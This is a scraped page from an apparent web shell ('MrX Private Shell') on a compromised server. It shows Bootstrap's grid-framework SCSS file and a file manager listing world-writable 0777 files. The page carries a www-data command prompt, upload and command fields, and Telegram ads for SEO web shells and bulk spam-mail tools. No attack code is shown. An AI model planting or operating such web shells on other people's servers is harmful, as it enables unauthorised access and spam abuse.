__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
// Framework grid generation
//
// Used only by Bootstrap to generate the correct number of grid classes given
// any value of `$grid-columns`.

@mixin make-grid-columns($columns: $grid-columns, $gutter: $grid-gutter-width, $breakpoints: $grid-breakpoints) {
  // Common properties for all breakpoints
  %grid-column {
    position: relative;
    width: 100%;
    padding-right: $gutter * .5;
    padding-left: $gutter * .5;
  }

  @each $breakpoint in map-keys($breakpoints) {
    $infix: breakpoint-infix($breakpoint, $breakpoints);

    @if $columns > 0 {
      // Allow columns to stretch full width below their breakpoints
      @for $i from 1 through $columns {
        .col#{$infix}-#{$i} {
          @extend %grid-column;
        }
      }
    }

    .col#{$infix},
    .col#{$infix}-auto {
      @extend %grid-column;
    }

    @include media-breakpoint-up($breakpoint, $breakpoints) {
      // Provide basic `.col-{bp}` classes for equal-width flexbox columns
      .col#{$infix} {
        flex-basis: 0;
        flex-grow: 1;
        max-width: 100%;
      }

      @if $grid-row-columns > 0 {
        @for $i from 1 through $grid-row-columns {
          .row-cols#{$infix}-#{$i} {
            @include row-cols($i);
          }
        }
      }

      .col#{$infix}-auto {
        @include make-col-auto();
      }

      @if $columns > 0 {
        @for $i from 1 through $columns {
          .col#{$infix}-#{$i} {
            @include make-col($i, $columns);
          }
        }
      }

      .order#{$infix}-first { order: -1; }

      .order#{$infix}-last { order: $columns + 1; }

      @for $i from 0 through $columns {
        .order#{$infix}-#{$i} { order: $i; }
      }

      @if $columns > 0 {
        // `$columns - 1` because offsetting by the width of an entire row isn't possible
        @for $i from 0 through ($columns - 1) {
          @if not ($infix == "" and $i == 0) { // Avoid emitting useless .offset-0
            .offset#{$infix}-#{$i} {
              @include make-col-offset($i, $columns);
            }
          }
        }
      }
    }
  }
}

Filemanager

Name Type Size Permission Actions
_alert.scss File 242 B 0777
_background-variant.scss File 695 B 0777
_badge.scss File 320 B 0777
_border-radius.scss File 1.79 KB 0777
_box-shadow.scss File 532 B 0777
_breakpoints.scss File 4.38 KB 0777
_buttons.scss File 3.44 KB 0777
_caret.scss File 1.39 KB 0777
_clearfix.scss File 93 B 0777
_deprecate.scss File 613 B 0777
_float.scss File 392 B 0777
_forms.scss File 5.68 KB 0777
_gradients.scss File 2 KB 0777
_grid-framework.scss File 2.04 KB 0777
_grid.scss File 2.04 KB 0777
_hover.scss File 757 B 0777
_image.scss File 1.13 KB 0777
_list-group.scss File 433 B 0777
_lists.scss File 170 B 0777
_nav-divider.scss File 369 B 0777
_pagination.scss File 462 B 0777
_reset-text.scss File 481 B 0777
_resize.scss File 202 B 0777
_screen-reader.scss File 827 B 0777
_size.scss File 148 B 0777
_table-row.scss File 794 B 0777
_text-emphasis.scss File 474 B 0777
_text-hide.scss File 326 B 0777
_text-truncate.scss File 168 B 0777
_transition.scss File 681 B 0777
_visibility.scss File 189 B 0777
Filemanager